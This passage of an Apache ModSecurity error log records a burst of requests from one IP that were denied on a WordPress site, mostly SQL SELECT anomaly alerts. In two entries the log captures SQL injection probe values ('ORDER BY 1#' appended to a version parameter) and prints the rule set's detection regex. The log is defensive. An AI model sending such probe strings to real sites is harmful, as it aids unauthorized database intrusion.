"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsIxkekPtrPbqLNY4eQAAAM0"] [Wed Jun 26 16:18:40.982454 2024] [:error] [pid 31859:tid 140055432812288] [client 141.98.81.52:34464] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsIxkekPtrPbqLNY4egAAAMM"] [Wed Jun 26 16:18:41.231279 2024] [:error] [pid 31859:tid 140055217645312] [client 141.98.81.52:34466] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsYxkekPtrPbqLNY4ewAAANQ"] [Wed Jun 26 16:18:41.475510 2024] [:error] [pid 31245:tid 140055226038016] [client 141.98.81.52:34472] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsa57xDCgKzJ-zxAxqAAAAFM"] [Wed Jun 26 16:18:41.756643 2024] [:error] [pid 31859:tid 140055209252608] [client 141.98.81.52:34474] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsYxkekPtrPbqLNY4fQAAANU"] [Wed Jun 26 16:18:42.014014 2024] [:error] [pid 31859:tid 140055309965056] [client 141.98.81.52:34476] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsoxkekPtrPbqLNY4fgAAAMk"] [Wed Jun 26 16:18:42.260476 2024] [:error] [pid 31859:tid 140055318357760] [client 141.98.81.52:34478] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsoxkekPtrPbqLNY4fwAAAMg"] [Wed Jun 26 16:18:42.521363 2024] [:error] [pid 31245:tid 140055416026880] [client 141.98.81.52:34480] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsq57xDCgKzJ-zxAxqQAAAEU"] [Wed Jun 26 16:18:42.774962 2024] [:error] [pid 31245:tid 140055276394240] [client 141.98.81.52:34482] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsq57xDCgKzJ-zxAxqgAAAE0"] [Wed Jun 26 16:18:43.727622 2024] [:error] [pid 31859:tid 140055407634176] [client 141.98.81.52:34484] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFs4xkekPtrPbqLNY4gAAAAMY"] [Wed Jun 26 16:18:43.974897 2024] [:error] [pid 31245:tid 140055441204992] [client 141.98.81.52:34486] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFs657xDCgKzJ-zxAxqwAAAEI"] [Wed Jun 26 16:18:44.231829 2024] [:error] [pid 31859:tid 140055449597696] [client 141.98.81.52:34488] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtIxkekPtrPbqLNY4gQAAAME"] [Wed Jun 26 16:18:44.487038 2024] [:error] [pid 31246:tid 140055301572352] [client 141.98.81.52:34490] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtFxchXPGtOGw21Gp-QAAAIo"] [Wed Jun 26 16:18:44.745577 2024] [:error] [pid 31246:tid 140055200859904] [client 141.98.81.52:34492] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtFxchXPGtOGw21Gp-gAAAJY"] [Wed Jun 26 16:18:45.001415 2024] [:error] [pid 31859:tid 140055416026880] [client 141.98.81.52:34494] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtYxkekPtrPbqLNY4ggAAAMU"] [Wed Jun 26 16:18:45.247471 2024] [:error] [pid 31859:tid 140055200859904] [client 141.98.81.52:34496] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtYxkekPtrPbqLNY4gwAAANY"] [Wed Jun 26 16:18:45.488534 2024] [:error] [pid 31246:tid 140055209252608] [client 141.98.81.52:34498] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtVxchXPGtOGw21Gp-wAAAJU"] [Wed Jun 26 16:18:45.731111 2024] [:error] [pid 31245:tid 140055293179648] [client 141.98.81.52:34500] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFta57xDCgKzJ-zxAxrAAAAEs"] [Wed Jun 26 16:18:45.977860 2024] [:error] [pid 31245:tid 140055318357760] [client 141.98.81.52:34502] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFta57xDCgKzJ-zxAxrQAAAEg"] [Wed Jun 26 16:18:46.223405 2024] [:error] [pid 31245:tid 140055326750464] [client 141.98.81.52:34504] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtq57xDCgKzJ-zxAxrgAAAEc"] [Wed Jun 26 16:18:46.472072 2024] [:error] [pid 31245:tid 140055209252608] [client 141.98.81.52:34506] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtq57xDCgKzJ-zxAxrwAAAFU"] [Wed Jun 26 16:18:46.718968 2024] [:error] [pid 31245:tid 140055192467200] [client 141.98.81.52:34508] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16%' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtq57xDCgKzJ-zxAxsAAAAFc"] [Wed Jun 26 16:18:46.962693 2024] [:error] [pid 31246:tid 140055242823424] [client 141.98.81.52:34510] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFtlxchXPGtOGw21Gp_AAAAJE"] [Wed Jun 26 16:18:47.437407 2024] [:error] [pid 31245:tid 140055301572352] [client 141.98.81.52:34512] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFt657xDCgKzJ-zxAxsQAAAEo"] [Wed Jun 26 16:18:47.699238 2024] [:error] [pid 31245:tid 140055200859904] [client 141.98.81.52:34514] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFt657xDCgKzJ-zxAxsgAAAFY"] [Wed Jun 26 16:18:47.951899 2024] [:error] [pid 31245:tid 140055184074496] [client 141.98.81.52:34516] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFt657xDCgKzJ-zxAxswAAAFg"] [Wed Jun 26 16:18:48.200270 2024] [:error] [pid 31245:tid 140055251216128] [client 141.98.81.52:34518] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFuK57xDCgKzJ-zxAxtAAAAFA"] [Wed Jun 26 16:18:48.459619 2024] [:error] [pid 31245:tid 140055234430720] [client 141.98.81.52:34520] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFuK57xDCgKzJ-zxAxtQAAAFI"] [Wed Jun 26 16:18:48.698063 2024] [:error] [pid 31859:tid 140055226038016] [client 141.98.81.52:34522] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFuIxkekPtrPbqLNY4hAAAANM"] [Wed Jun 26 16:18:48.934101 2024] [:error] [pid 31245:tid 140055259608832] [client 141.98.81.52:34524] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFuK57xDCgKzJ-zxAxtgAAAE8"] [Wed Jun 26 16:18:51.019697 2024] [:error] [pid 31245:tid 140055457990400] [client 141.98.81.52:34526] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri 